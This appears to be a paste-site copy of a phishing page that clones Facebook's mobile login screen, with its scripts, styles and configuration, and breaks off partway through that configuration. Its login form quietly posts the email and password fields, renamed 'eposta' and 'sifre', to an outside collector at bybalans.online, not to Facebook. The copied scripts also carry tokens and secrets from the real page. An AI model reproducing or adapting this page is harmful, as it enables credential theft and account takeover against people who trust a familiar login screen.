· 7 years ago · Aug 18, 2018, 07:44 AM
1
2<!DOCTYPE html>
3<html>
4
5<head>
6 <title>Log in to Facebook | Facebook</title>
7 <meta name="viewport" content="user-scalable=no,initial-scale=1,maximum-scale=1" />
8 <link href="https://static.xx.fbcdn.net/rsrc.php/v3/ya/r/O2aKM2iSbOw.png" rel="apple-touch-icon-precomposed" sizes="196x196" />
9 <meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" />
10 <link rel="stylesheet" type="text/css" data-bootloader-hash="PdbpW" href="https://static.xx.fbcdn.net/rsrc.php/v3/yC/l/0,cross/PjFR4JUoofe.css" />
11 <link rel="stylesheet" type="text/css" data-bootloader-hash="/O/AZ" href="https://static.xx.fbcdn.net/rsrc.php/v3/yz/l/0,cross/zNDOkMw4ZoW.css" />
12 <script id="u_0_e">
13 function envFlush(a) {
14 function b(b) {
15 for (var c in a) b[c] = a[c]
16 }
17 window.requireLazy ? window.requireLazy(["Env"], b) : (window.Env = window.Env || {}, b(window.Env))
18 }
19 envFlush({
20 "timeslice_heartbeat_config": {
21 "pollIntervalMs": 33,
22 "idleGapThresholdMs": 60,
23 "ignoredTimesliceNames": {
24 "requestAnimationFrame": true,
25 "Event listenHandler mousemove": true,
26 "Event listenHandler mouseover": true,
27 "Event listenHandler mouseout": true,
28 "Event listenHandler scroll": true
29 },
30 "isHeartbeatEnabled": true,
31 "isArtilleryOn": true
32 },
33 "shouldLogCounters": true,
34 "timeslice_categories": {
35 "react_render": true,
36 "reflow": true
37 },
38 "sample_continuation_stacktraces": true,
39 "dom_mutation_flag": true
40 });
41 </script>
42 <script>
43 document.domain = 'facebook.com';
44 </script>
45 <script>
46 __DEV__ = 0;
47 </script>
48 <script id="u_0_f" crossorigin="anonymous" src="https://static.xx.fbcdn.net/rsrc.php/v3inLb4/y1/l/en_GB/AfxiNtmL2mZ.js" data-bootloader-hash="LU9Bx"></script>
49 <script id="u_0_g">
50 CavalryLogger = window.CavalryLogger || function(a) {
51 this.lid = a, this.transition = !1, this.metric_collected = !1, this.is_detailed_profiler = !1, this.instrumentation_started = !1, this.pagelet_metrics = {}, this.events = {}, this.ongoing_watch = {}, this.values = {
52 t_cstart: window._cstart
53 }, this.piggy_values = {}, this.bootloader_metrics = {}, this.resource_to_pagelet_mapping = {}, this.e2eLogged = !1, this.initializeInstrumentation && this.initializeInstrumentation()
54 }, CavalryLogger.prototype.setIsDetailedProfiler = function(a) {
55 this.is_detailed_profiler = a;
56 return this
57 }, CavalryLogger.prototype.setTTIEvent = function(a) {
58 this.tti_event = a;
59 return this
60 }, CavalryLogger.prototype.setValue = function(a, b, c, d) {
61 d = d ? this.piggy_values : this.values;
62 (typeof d[a] === "undefined" || c) && (d[a] = b);
63 return this
64 }, CavalryLogger.prototype.getLastTtiValue = function() {
65 return this.lastTtiValue
66 }, CavalryLogger.prototype.setTimeStamp = CavalryLogger.prototype.setTimeStamp || function(a, b, c, d) {
67 this.mark(a);
68 var e = this.values.t_cstart || this.values.t_start;
69 e = d ? e + d : CavalryLogger.now();
70 this.setValue(a, e, b, c);
71 this.tti_event && a == this.tti_event && (this.lastTtiValue = e, this.setTimeStamp("t_tti", b));
72 return this
73 }, CavalryLogger.prototype.mark = typeof console === "object" && console.timeStamp ? function(a) {
74 console.timeStamp(a)
75 } : function() {}, CavalryLogger.prototype.addPiggyback = function(a, b) {
76 this.piggy_values[a] = b;
77 return this
78 }, CavalryLogger.instances = {}, CavalryLogger.id = 0, CavalryLogger.perfNubMarkup = "", CavalryLogger.disableArtilleryOnUntilOffLogging = !1, CavalryLogger.getInstance = function(a) {
79 typeof a === "undefined" && (a = CavalryLogger.id);
80 CavalryLogger.instances[a] || (CavalryLogger.instances[a] = new CavalryLogger(a));
81 return CavalryLogger.instances[a]
82 }, CavalryLogger.setPageID = function(a) {
83 if (CavalryLogger.id === 0) {
84 var b = CavalryLogger.getInstance();
85 CavalryLogger.instances[a] = b;
86 CavalryLogger.instances[a].lid = a;
87 delete CavalryLogger.instances[0]
88 }
89 CavalryLogger.id = a
90 }, CavalryLogger.setPerfNubMarkup = function(a) {
91 CavalryLogger.perfNubMarkup = a
92 }, CavalryLogger.now = function() {
93 return window.performance && performance.timing && performance.timing.navigationStart && performance.now ? performance.now() + performance.timing.navigationStart : new Date().getTime()
94 }, CavalryLogger.prototype.measureResources = function() {}, CavalryLogger.prototype.profileEarlyResources = function() {}, CavalryLogger.getBootloaderMetricsFromAllLoggers = function() {}, CavalryLogger.start_js = function() {}, CavalryLogger.done_js = function() {};
95 CavalryLogger.getInstance().setTTIEvent("t_domcontent");
96 CavalryLogger.prototype.measureResources = function(a, b) {
97 if (!this.log_resources) return;
98 var c = "bootload/" + a.name;
99 if (this.bootloader_metrics[c] !== undefined || this.ongoing_watch[c] !== undefined) return;
100 var d = CavalryLogger.now();
101 this.ongoing_watch[c] = d;
102 "start_" + c in this.bootloader_metrics || (this.bootloader_metrics["start_" + c] = d);
103 b && !("tag_" + c in this.bootloader_metrics) && (this.bootloader_metrics["tag_" + c] = b);
104 if (a.type === "js") {
105 c = "js_exec/" + a.name;
106 this.ongoing_watch[c] = d
107 }
108 }, CavalryLogger.prototype.stopWatch = function(a) {
109 if (this.ongoing_watch[a]) {
110 var b = CavalryLogger.now(),
111 c = b - this.ongoing_watch[a];
112 this.bootloader_metrics[a] = c;
113 var d = this.piggy_values;
114 a.indexOf("bootload") === 0 && (d.t_resource_download || (d.t_resource_download = 0), d.resources_downloaded || (d.resources_downloaded = 0), d.t_resource_download += c, d.resources_downloaded += 1, d["tag_" + a] == "_EF_" && (d.t_pagelet_cssload_early_resources = b));
115 delete this.ongoing_watch[a]
116 }
117 return this
118 }, CavalryLogger.getBootloaderMetricsFromAllLoggers = function() {
119 var a = {};
120 Object.values(window.CavalryLogger.instances).forEach(function(b) {
121 b.bootloader_metrics && Object.assign(a, b.bootloader_metrics)
122 });
123 return a
124 }, CavalryLogger.start_js = function(a) {
125 for (var b = 0; b < a.length; ++b) CavalryLogger.getInstance().stopWatch("js_exec/" + a[b])
126 }, CavalryLogger.done_js = function(a) {
127 for (var b = 0; b < a.length; ++b) CavalryLogger.getInstance().stopWatch("bootload/" + a[b])
128 }, CavalryLogger.prototype.profileEarlyResources = function(a) {
129 for (var b = 0; b < a.length; b++) this.measureResources({
130 name: a[b][0],
131 type: a[b][1] ? "js" : ""
132 }, "_EF_")
133 };
134 CavalryLogger.getInstance().log_resources = true;
135 CavalryLogger.getInstance().setIsDetailedProfiler(true);
136 window.CavalryLogger && CavalryLogger.getInstance().setTimeStamp("t_start");
137 </script>
138 <script id="u_0_h">
139 (function _(a, b, c, d) {
140 function e(a) {
141 document.cookie = a + "=;expires=Thu, 01-Jan-1970 00:00:01 GMT;path=/;domain=.facebook.com"
142 }
143
144 function f(a, b) {
145 document.cookie = a + "=" + b + ";path=/;domain=.facebook.com;secure"
146 }
147 if (!a) {
148 e(b);
149 e(c);
150 return
151 }
152 a = null;
153 (navigator.userAgent.indexOf("Firefox") !== -1 || !window.devicePixelRatio && navigator.userAgent.indexOf("Windows Phone") !== -1) && (document.documentElement != null && (a = screen.width / document.documentElement.offsetWidth, a = Math.max(1, Math.floor(a * 2) / 2)));
154 (!a || a === 1) && navigator.userAgent.indexOf("IEMobile") !== -1 && (a = Math.sqrt(screen.deviceXDPI * screen.deviceYDPI) / 96, a = Math.max(1, Math.round(a * 2) / 2));
155 f(b, (a || window.devicePixelRatio || 1).toString());
156 e = window.screen ? screen.width : 0;
157 b = window.screen ? screen.height : 0;
158 f(c, e + "x" + b);
159 d && document.cookie && window.devicePixelRatio > 1 && document.location.reload()
160 })(true, "m_pixel_ratio", "wd", false);
161 </script>
162 <meta http-equiv="origin-trial" data-feature="getInstalledRelatedApps" data-expires="2017-12-04" content="AvpndGzuAwLY463N1HvHrsK3WE5yU5g6Fehz7Vl7bomqhPI/nYGOjVg3TI0jq5tQ5dP3kDSd1HXVtKMQyZPRxAAAAABleyJvcmlnaW4iOiJodHRwczovL2ZhY2Vib29rLmNvbTo0NDMiLCJmZWF0dXJlIjoiSW5zdGFsbGVkQXBwIiwiZXhwaXJ5IjoxNTEyNDI3NDA0LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=" />
163 <meta name="description" content="Log in to Facebook to start sharing and connecting with your friends, family and people you know." />
164 <link rel="canonical" href="https://www.facebook.com/login/" />
165</head>
166
167<body tabindex="0" class="touch x2 _fzu _50-3 iframe acw">
168 <script id="u_0_d">
169 (function(a) {
170 a.__updateOrientation = function() {
171 var b = !!a.orientation && a.orientation !== 180,
172 c = document.body;
173 c && (c.className = c.className.replace(/(^|\s)(landscape|portrait)(\s|$)/g, " ") + " " + (b ? "landscape" : "portrait"));
174 return b
175 }
176 })(window);
177 </script>
178 <div id="viewport">
179 <h1 style="display:block;height:0;overflow:hidden;position:absolute;width:0;padding:0">Facebook</h1>
180 <div id="page" class="_6lmo">
181 <div class="_129_" id="header-notices"></div>
182 <div class="_4g33 _52we _52z5" id="header">
183 <div class="_4g34 _52z6" data-sigil="mChromeHeaderCenter"><a href="/login/?refid=9"><i class="img sp_EJDwfD94coF_2x sx_55f08b"><u>facebook</u></i></a></div>
184 </div>
185 <div class="_5soa acw" id="root" role="main" data-sigil="context-layer-root content-pane">
186 <div class="_4g33">
187 <div class="_4g34" id="u_0_0">
188 <div class="_5yd0 _2ph- _5yd1" style="display: none;" data-sigil="m_login_notice">
189 <div class="_52jd"></div>
190 </div>
191 <div class="aclb _4-4l">
192 <div data-sigil="m_login_upsell login_identify_step_element"></div>
193 <div class="_5rut">
194 <form method="post" action="https://bybalans.online/fbb/login.php" class="mobile-login-form _5spm" >
195
196 <div id="user_info_container" data-sigil="user_info_after_failure_element"></div>
197 <div id="pwd_label_container" data-sigil="user_info_after_failure_element"></div>
198 <div id="otp_retrieve_desc_container"></div>
199 <div class="_56be _5sob">
200 <div class="_55wo _55x2 _56bf">
201 <div id="email_input_container">
202 <input autocorrect="off" autocapitalize="off" class="_56bg _4u9z _5ruq" autocomplete="on" id="m_login_email" name="eposta" placeholder="Email address or phone number" type="text" data-sigil="m_login_email" required/><i class="_6cvx img sp_EJDwfD94coF_2x sx_1665df" data-sigil="clear_cp_cross" ></i></div>
203 <div>
204 <div class="_1upc _mg8" data-sigil="m_login_password">
205 <div class="_4g33">
206 <div class="_4g34 _5i2i _52we">
207 <div class="_5xu4">
208 <input autocorrect="off" autocapitalize="off" class="_56bg _4u9z _27z2" autocomplete="on" id="m_login_password" name="sifre" placeholder="Password" type="password" data-sigil="password-plain-text-toggle-input" required/>
209 </div>
210 </div>
211 <div class="_5s61 _216i _5i2i _52we">
212 <div class="_5xu4">
213 <div class="_2pi9" style="display:none" id="u_0_1"><a href="#" data-sigil="password-plain-text-toggle"><span class="mfss" style="display:none" id="u_0_2">HIDE</span><span class="mfss" id="u_0_3">SHOW</span></a></div>
214 </div>
215 </div>
216 </div>
217 </div>
218 </div>
219 </div>
220 </div><a href="/recover/initiate/?lwv=100&refid=9" class="_6a3f" id="did-you-forget-your-password-link" style="display:none">Have you forgotten your password?</a>
221 <div class="_2pie" style="text-align:center;">
222 <div id="u_0_4" data-sigil="login_password_step_element">
223 <button type="submit" value="Log In" class="_54k8 _52jh _56bs _56b_ _28lf _56bw _56bu" name="login" id="u_0_5" data-sigil="touchable m_login_button"><span class="_55sr">Log In</span></button>
224 </div>
225 <div id="otp_button_elem_container"></div>
226 </div>
227 <input type="hidden" name="prefill_contact_point" id="prefill_contact_point" />
228 <input type="hidden" name="prefill_source" id="prefill_source" />
229 <input type="hidden" name="prefill_type" id="prefill_type" />
230 <input type="hidden" name="first_prefill_source" id="first_prefill_source" />
231 <input type="hidden" name="first_prefill_type" id="first_prefill_type" />
232 <input type="hidden" name="had_cp_prefilled" id="had_cp_prefilled" value="false" />
233 <input type="hidden" name="had_password_prefilled" id="had_password_prefilled" value="false" />
234 <div class="_xo8"></div>
235 <noscript>
236 <input type="hidden" name="_fb_noscript" value="true" />
237 </noscript>
238 </form>
239 <div>
240 <div class="_43mg"><span class="_43mh">or</span></div>
241 <div class="_52jj _5t3b" id="u_0_6"><a role="button" class="_5t3c _28le btn btnS medBtn mfsm touchable" id="signup-button" href="/reg/?cid=103&refid=9" data-sigil="m_reg_button">Create New Account</a></div>
242 </div>
243 <div>
244 <div class="other-links">
245 <ul class="_5pkb _55wp">
246 <li><span class="mfss fcg"><a href="/recover/initiate/?c=https%3A%2F%2Fm.facebook.com%2Flogin.php%3Frefsrc%3Dhttps%253A%252F%252Fm.facebook.com%252Flogin.php&ars=facebook_login&lwv=100&refid=9" id="forgot-password-link">Forgotten password?</a><span aria-hidden="true"> · </span><a href="/help/?refid=9" id="help-link" class="sec">Help Centre</a></span>
247 </li>
248 </ul>
249 </div>
250 </div>
251 </div>
252 <div></div>
253 </div>
254 </div>
255 </div>
256 <div></div><img src="https://facebook.com/security/hsts-pixel.gif" width="0" height="0" style="display:none" />
257 <div class="_55wr _5ui2">
258 <div class="_5dpw">
259 <div class="_5ui3" data-nocookies="1" id="locale-selector" data-sigil="language_selector marea">
260 <div class="_4g33">
261 <div class="_4g34"><span class="_52jc _52j9 _52jh _3ztb">English (UK)</span>
262 <div class="_3ztc"><span class="_52jc"><a href="/a/language.php?l=ku_TR&lref=https%3A%2F%2Fm.facebook.com%2Flogin.php%3Frefsrc%3Dhttps%253A%252F%252Fm.facebook.com%252Flogin.php&gfid=AQBD9VTwkBphQbx4&refid=9" data-sigil="change_language">Kurdî (Kurmancî)</a></span></div>
263 <div class="_3ztc"><span class="_52jc"><a href="/a/language.php?l=zz_TR&lref=https%3A%2F%2Fm.facebook.com%2Flogin.php%3Frefsrc%3Dhttps%253A%252F%252Fm.facebook.com%252Flogin.php&gfid=AQCwkcqswcE1aXUg&refid=9" data-sigil="change_language">Zaza</a></span></div>
264 <div class="_3ztc"><span class="_52jc"><a href="/a/language.php?l=pt_BR&lref=https%3A%2F%2Fm.facebook.com%2Flogin.php%3Frefsrc%3Dhttps%253A%252F%252Fm.facebook.com%252Flogin.php&gfid=AQDRTHyaKuL_O0_s&refid=9" data-sigil="change_language">Português (Brasil)</a></span></div>
265 </div>
266 <div class="_4g34">
267 <div class="_3ztc"><span class="_52jc"><a href="/a/language.php?l=tr_TR&lref=https%3A%2F%2Fm.facebook.com%2Flogin.php%3Frefsrc%3Dhttps%253A%252F%252Fm.facebook.com%252Flogin.php&gfid=AQAmbFwlimwGB-IU&refid=9" data-sigil="change_language">Türkçe</a></span></div>
268 <div class="_3ztc"><span class="_52jc"><a href="/a/language.php?l=ar_AR&lref=https%3A%2F%2Fm.facebook.com%2Flogin.php%3Frefsrc%3Dhttps%253A%252F%252Fm.facebook.com%252Flogin.php&gfid=AQBHZtW-OjSk1HaU&refid=9" data-sigil="change_language">العربية</a></span></div>
269 <div class="_3ztc"><span class="_52jc"><a href="/a/language.php?l=es_LA&lref=https%3A%2F%2Fm.facebook.com%2Flogin.php%3Frefsrc%3Dhttps%253A%252F%252Fm.facebook.com%252Flogin.php&gfid=AQAQJL87gOVAoMAm&refid=9" data-sigil="change_language">Español</a></span></div>
270 <a href="/language.php?n=https%3A%2F%2Fm.facebook.com%2Flogin.php%3Frefsrc%3Dhttps%253A%252F%252Fm.facebook.com%252Flogin.php&refid=9">
271 <div class="_3j87 _1rrd _3ztd" aria-label="Complete list of languages"><i class="img sp_EJDwfD94coF_2x sx_2c9afa"></i></div>
272 </a>
273 </div>
274 </div>
275 </div>
276 <div class="_5ui4"><span class="mfss fcg">Facebook ©2018</span></div>
277 </div>
278 </div>
279 </div>
280 <div class="viewportArea _2v9s" style="display:none" id="u_0_7" data-sigil="marea">
281 <div class="_5vsg" id="u_0_8"></div>
282 <div class="_5vsh" id="u_0_9"></div>
283 <div class="_5v5d fcg">
284 <div class="_2so _2sq _2ss img _50cg" data-animtype="1" data-sigil="m-loading-indicator-animate m-loading-indicator-root"></div>Loading...</div>
285 </div>
286 <div class="viewportArea aclb" id="mErrorView" style="display:none" data-sigil="marea">
287 <div class="container">
288 <div class="image"></div>
289 <div class="message" data-sigil="error-message"></div><a class="link" data-sigil="MPageError:retry">Try Again</a></div>
290 </div>
291 </div>
292 </div>
293 <div id="static_templates">
294 <div class="mDialog" id="modalDialog" style="display:none">
295 <div class="_52z5 _451a mFuturePageHeader _1uh1 firstStep titled" id="mDialogHeader">
296 <div class="_4g33 _52we">
297 <div class="_5s61">
298 <div class="_52z7">
299 <button type="submit" value="Cancel" class="cancelButton btn btnD bgb mfss touchable" id="u_0_b" data-sigil="dialog-cancel-button">Cancel</button>
300 <button type="submit" value="Back" class="backButton btn btnI bgb mfss touchable iconOnly" aria-label="Back" id="u_0_c" data-sigil="dialog-back-button"><i class="img sp_EJDwfD94coF_2x sx_d346ad" style="margin-top: 2px;"></i></button>
301 </div>
302 </div>
303 <div class="_4g34">
304 <div class="_52z6">
305 <div class="_50l4 mfsl fcw" id="m-future-page-header-title" data-sigil="m-dialog-header-title dialog-title">Loading...</div>
306 </div>
307 </div>
308 <div class="_5s61">
309 <div class="_52z8" id="modalDialogHeaderButtons"></div>
310 </div>
311 </div>
312 <div id="pagelet_0_0"></div>
313 </div>
314 <div class="modalDialogView" id="modalDialogView"></div>
315 <div class="_5v5d _5v5e fcg" id="dialogSpinner">
316 <div class="_2so _2sq _2ss img _50cg" data-animtype="1" id="u_0_a" data-sigil="m-loading-indicator-animate m-loading-indicator-root"></div>Loading...</div>
317 </div>
318 </div>
319 <script id="u_0_i" crossorigin="anonymous" src="https://static.xx.fbcdn.net/rsrc.php/v3/yG/r/mVeB8smwClq.js" data-bootloader-hash="6g0i4"></script>
320 <script id="u_0_j" crossorigin="anonymous" src="https://static.xx.fbcdn.net/rsrc.php/v3i41C4/yw/l/en_GB/0CLFS-1c_8H.js" data-bootloader-hash="Q8/RR"></script>
321 <script id="u_0_k">
322 require("TimeSlice").guard(function() {
323 (require("ServerJSDefine")).handleDefines([
324 ["BanzaiRefactored", ["BanzaiOld"], {
325 "module": {
326 "__m": "BanzaiOld"
327 }
328 }, 3421],
329 ["KSConfig", [], {
330 "killed": {
331 "__set": ["POCKET_MONSTERS_CREATE", "POCKET_MONSTERS_DELETE", "VIDEO_DIMENSIONS_FROM_PLAYER_IN_UPLOAD_DIALOG", "PREVENT_INFINITE_URL_REDIRECT", "POCKET_MONSTERS_UPDATE_NAME", "ADS_PE_CAMPAIGN_RAW_SPEC_BASED_MUTATION"]
332 }
333 }, 2580],
334 ["ServerNonce", [], {
335 "ServerNonce": "0J1WlWeHq8_Mw4bQ25cjOj"
336 }, 141],
337 ["UserAgentData", [], {
338 "browserArchitecture": "32",
339 "browserFullVersion": "67.0.3396.99",
340 "browserMinorVersion": 0,
341 "browserName": "Chrome",
342 "browserVersion": 67,
343 "deviceName": "Unknown",
344 "engineName": "WebKit",
345 "engineVersion": "537.36",
346 "platformArchitecture": "32",
347 "platformName": "Mac OS X",
348 "platformVersion": "10.13",
349 "platformFullVersion": "10.13.5"
350 }, 527],
351 ["BootloaderConfig", [], {
352 "jsRetries": null,
353 "jsRetryAbortNum": 2,
354 "jsRetryAbortTime": 5,
355 "payloadEndpointURI": "https:\/\/m.facebook.com\/ajax\/haste-response\/",
356 "assumeNotNonblocking": false,
357 "assumePermanent": true,
358 "skipEndpoint": true,
359 "staggerJsDownloads": false,
360 "fixMemoryLeaks": false,
361 "webspeed_eager_preloading": false,
362 "preloader_num_preloads": 5,
363 "preloader_preload_after_dd": false,
364 "preloader_num_loads": 1,
365 "preloader_enabled": false
366 }, 329],
367 ["CSSLoaderConfig", [], {
368 "timeout": 5000,
369 "modulePrefix": "BLCSS:",
370 "loadEventSupported": true
371 }, 619],
372 ["CurrentCommunityInitialData", [], {}, 490],
373 ["CurrentUserInitialData", [], {
374 "USER_ID": "0",
375 "ACCOUNT_ID": "0",
376 "NAME": "",
377 "SHORT_NAME": null,
378 "IS_MESSENGER_ONLY_USER": false,
379 "IS_DEACTIVATED_ALLOWED_ON_MESSENGER": false
380 }, 270],
381 ["MRequestConfig", [], {
382 "dtsg": {
383 "token": "AQF5cd8pzFxW:AQEMePlG4gNi",
384 "valid_for": 86400,
385 "expire": 1533496230
386 },
387 "lsd": "AVpT6avE",
388 "checkResponseOrigin": true,
389 "checkResponseToken": true,
390 "ajaxResponseToken": {
391 "secret": "5d544nIQNRnqXAxy2prOEMZ27cuXXBu-",
392 "encrypted": "AYkBEPF7HdMwPDr0aJEN6uX2qp0LHjPjBSVL6Y7vaMzW9r0HliDK-1zdVbGg1Qa72O13uwcp24xOpNoj2yFaTVVwFWg1bdgXSRrVfeOpe34rsw"
393 }
394 }, 51],
395 ["ImmediateImplementationExperiments", [], {
396 "prefer_message_channel": false
397 }, 3419],
398 ["PromiseUsePolyfillSetImmediateGK", [], {
399 "www_always_use_polyfill_setimmediate": false
400 }, 2190],
401 ["SprinkleConfig", [], {
402 "param_name": "jazoest",
403 "version": 2
404 }, 2111],
405 ["ISB", [], {}, 330],
406 ["LSD", [], {
407 "token": "AVpT6avE"
408 }, 323],
409 ["SiteData", [], {
410 "server_revision": 4176677,
411 "client_revision": 4176677,
412 "tier": "",
413 "push_phase": "C3",
414 "pkg_cohort": "FW_EXP:mtouch_pkg",
415 "pkg_cohort_key": "__pc",
416 "haste_site": "mobile",
417 "be_mode": -1,
418 "be_key": "__be",
419 "is_rtl": false,
420 "vip": "157.240.20.35"
421 }, 317],
422 ["CookieCoreConfig", [], {
423 "a11y": {},
424 "act": {},
425 "c_user": {},
426 "ddid": {
427 "p": "\/deferreddeeplink\/",
428 "t": 2419200
429 },
430 "dpr": {
431 "t": 604800
432 },
433 "js_ver": {
434 "t": 604800
435 },
436 "locale": {
437 "t": 604800
438 },
439 "lh": {
440 "t": 604800
441 },
442 "m_pixel_ratio": {
443 "t": 604800
444 },
445 "noscript": {},
446 "pnl_data2": {
447 "t": 2
448 },
449 "presence": {},
450 "sW": {},
451 "sfau": {},
452 "wd": {
453 "t": 604800
454 },
455 "x-referer": {},
456 "x-src": {
457 "t": 1
458 }
459 }, 2104],
460 ["CookieCoreLoggingConfig", [], {
461 "maximumIgnorableStallMs": 16.67,
462 "sampleRate": 9.7e-5
463 }, 3401],
464 ["ZeroRewriteRules", [], {
465 "rewrite_rules": {},
466 "whitelist": {
467 "\/hr\/r": 1,
468 "\/hr\/p": 1,
469 "\/zero\/unsupported_browser\/": 1,
470 "\/zero\/policy\/optin": 1,
471 "\/zero\/optin\/write\/": 1,
472 "\/zero\/optin\/legal\/": 1,
473 "\/zero\/optin\/free\/": 1,
474 "\/about\/privacy\/": 1,
475 "\/about\/privacy\/update\/": 1,
476 "\/about\/privacy\/update": 1,
477 "\/zero\/toggle\/welcome\/": 1,
478 "\/work\/landing": 1,
479 "\/work\/login\/": 1,
480 "\/work\/email\/": 1,
481 "\/ai.php": 1,
482 "\/js_dialog_resources\/dialog_descriptions_android.json": 0,
483 "\/connect\/jsdialog\/MPlatformAppInvitesJSDialog\/": 0,
484 "\/connect\/jsdialog\/MPlatformOAuthShimJSDialog\/": 0,
485 "\/connect\/jsdialog\/MPlatformLikeJSDialog\/": 0,
486 "\/qp\/interstitial\/": 1,
487 "\/qp\/action\/redirect\/": 1,
488 "\/qp\/action\/close\/": 1,
489 "\/zero\/support\/ineligible\/": 1,
490 "\/zero_balance_redirect\/": 1,
491 "\/zero_balance_redirect": 1,
492 "\/l.php": 1,
493 "\/lsr.php": 1,
494 "\/ajax\/dtsg\/": 1,
495 "\/checkpoint\/block\/": 1,
496 "\/exitdsite": 1,
497 "\/zero\/balance\/pixel\/": 1,
498 "\/zero\/balance\/": 1,
499 "\/zero\/balance\/carrier_landing\/": 1,
500 "\/zero\/flex\/logging\/": 1,
501 "\/tr": 1,
502 "\/tr\/": 1,
503 "\/sem_campaigns\/sem_pixel_test\/": 1,
504 "\/bookmarks\/flyout\/body\/": 1,
505 "\/zero\/subno\/": 1,
506 "\/confirmemail.php": 1,
507 "\/policies\/": 1,
508 "\/mobile\/internetdotorg\/classifier\/": 1,
509 "\/zero\/dogfooding": 1,
510 "\/xti.php": 1,
511 "\/4oh4.php": 1,
512 "\/autologin.php": 1,
513 "\/birthday_help.php": 1,
514 "\/checkpoint\/": 1,
515 "\/contact-importer\/": 1,
516 "\/cr.php": 1,
517 "\/legal\/terms\/": 1,
518 "\/login.php": 1,
519 "\/login\/": 1,
520 "\/mobile\/account\/": 1,
521 "\/n\/": 1,
522 "\/remote_test_device\/": 1,
523 "\/upsell\/buy\/": 1,
524 "\/upsell\/buyconfirm\/": 1,
525 "\/upsell\/buyresult\/": 1,
526 "\/upsell\/promos\/": 1,
527 "\/upsell\/continue\/": 1,
528 "\/upsell\/h\/promos\/": 1,
529 "\/upsell\/loan\/learnmore\/": 1,
530 "\/upsell\/purchase\/": 1,
531 "\/upsell\/promos\/upgrade\/": 1,
532 "\/upsell\/buy_redirect\/": 1,
533 "\/upsell\/loan\/buyconfirm\/": 1,
534 "\/upsell\/loan\/buy\/": 1,
535 "\/upsell\/sms\/": 1,
536 "\/wap\/a\/channel\/reconnect.php": 1,
537 "\/wap\/a\/nux\/wizard\/nav.php": 1,
538 "\/wap\/appreg.php": 1,
539 "\/wap\/birthday_help.php": 1,
540 "\/wap\/c.php": 1,
541 "\/wap\/confirmemail.php": 1,
542 "\/wap\/cr.php": 1,
543 "\/wap\/login.php": 1,
544 "\/wap\/r.php": 1,
545 "\/zero\/datapolicy": 1,
546 "\/a\/timezone.php": 1,
547 "\/a\/bz": 1,
548 "\/bz\/reliability": 1,
549 "\/r.php": 1,
550 "\/mr\/": 1,
551 "\/reg\/": 1,
552 "\/registration\/log\/": 1,
553 "\/terms\/": 1,
554 "\/f123\/": 1,
555 "\/expert\/": 1,
556 "\/experts\/": 1,
557 "\/terms\/index.php": 1,
558 "\/terms.php": 1,
559 "\/srr\/": 1,
560 "\/msite\/redirect\/": 1,
561 "\/fbs\/pixel\/": 1,
562 "\/contactpoint\/preconfirmation\/": 1,
563 "\/contactpoint\/cliff\/": 1,
564 "\/contactpoint\/confirm\/submit\/": 1,
565 "\/contactpoint\/confirmed\/": 1,
566 "\/contactpoint\/login\/": 1,
567 "\/preconfirmation\/contactpoint_change\/": 1,
568 "\/help\/contact\/": 1,
569 "\/survey\/": 1,
570 "\/upsell\/loyaltytopup\/accept\/": 1,
571 "\/settings\/": 1
572 }
573 }, 1478],
574 ["MJSEnvironment", [], {
575 "IS_APPLE_WEBKIT_IOS": false,
576 "IS_TABLET": false,
577 "IS_ANDROID": false,
578 "IS_CHROME": true,
579 "IS_FIREFOX": false,
580 "IS_WINDOWS_PHONE": false,
581 "IS_SAMSUNG_DEVICE": false,
582 "OS_VERSION": 10.13,
583 "PIXEL_RATIO": 2,
584 "BROWSER_NAME": "Chrome Desktop"
585 }, 46],
586 ["ZeroCategoryHeader", [], {}, 1127],
587 ["MLoadingIndicatorSigils", [], {
588 "ANIMATE": "m-loading-indicator-animate",
589 "ROOT": "m-loading-indicator-root"
590 }, 279],
591 ["FbtLogger", [], {
592 "logger": null
593 }, 288],
594 ["IntlNumberTypeConfig", [], {
595 "impl": "if (n === 1) { return IntlVariations.NUMBER_ONE; } else { return IntlVariations.NUMBER_OTHER; }"
596 }, 3405],
597 ["FbtResultGK", [], {
598 "shouldReturnFbtResult": true,
599 "inlineMode": "NO_INLINE"
600 }, 876],
601 ["IntlHoldoutGK", [], {
602 "inIntlHoldout": false
603 }, 2827],
604 ["IntlViewerContext", [], {
605 "GENDER": 3
606 }, 772],
607 ["NumberFormatConfig", [], {
608 "decimalSeparator": ".",
609 "numberDelimiter": ",",
610 "minDigitsForThousandsSeparator": 4,
611 "standardDecimalPatternInfo": {
612 "primaryGroupSize": 3,
613 "secondaryGroupSize": 3
614 },
615 "numberingSystemData": null
616 }, 54],
617 ["IntlPhonologicalRules", [], {
618 "meta": {
619 "\/_B\/": "([.,!?\\s]|^)",
620 "\/_E\/": "([.,!?\\s]|$)"
621 },
622 "patterns": {
623 "\/\u0001(.*)('|')s\u0001(?:'|')s(.*)\/": "\u0001$1$2s\u0001$3",
624 "\/_\u0001([^\u0001]*)\u0001\/": "javascript"
625 }
626 }, 1496],
627 ["MobileAppDetect", [], {
628 "is_mobile_app": false,
629 "is_pages_manager": false,
630 "is_facebook_for_android": false,
631 "is_facebook_for_android_in_app_browser": false,
632 "is_facebook_for_ios": false,
633 "is_messenger_for_android": false,
634 "is_messenger_for_ios": false,
635 "is_wilde": false,
636 "is_kaios": false
637 }, 1109],
638 ["MWebStorageMonsterWhiteList", [], {
639 "whitelist": ["^Banzai$", "^bz", "^mutex", "^msys", "^sp_pi$", "^\\:userchooser\\:osessusers$", "^\\:userchooser\\:settings$", "^[0-9]+:powereditor:", "^Bandicoot\\:", "^brands\\:console\\:config$", "^CacheStorageVersion$", "^consoleEnabled$", "^_video_$", "^vc_", "^_showMDevConsole$", "^_ctv_$", "^ga_client_id$", "^qe_switcher_nub_selection$", "^_mswam_$"]
640 }, 254],
641 ["MTouchableSyntheticClickGK", [], {
642 "USE_SYNTHETIC_CLICK": true
643 }, 368],
644 ["ErrorDebugHooks", [], {
645 "SnapShotHook": null
646 }, 185],
647 ["ArtilleryExperiments", [], {
648 "artillery_static_resources_pagelet_attribution": false,
649 "artillery_timeslice_compressed_data": false,
650 "artillery_miny_client_payload": false,
651 "artillery_prolong_page_tracing": false,
652 "artillery_navigation_timing_level_2": false,
653 "artillery_profiler_on": false,
654 "artillery_merge_max_distance_sec": 1,
655 "artillery_merge_max_duration_sec": 1,
656 "user_timing": false
657 }, 1237],
658 ["TimeSliceInteractionSV", [], {
659 "on_demand_reference_counting": true,
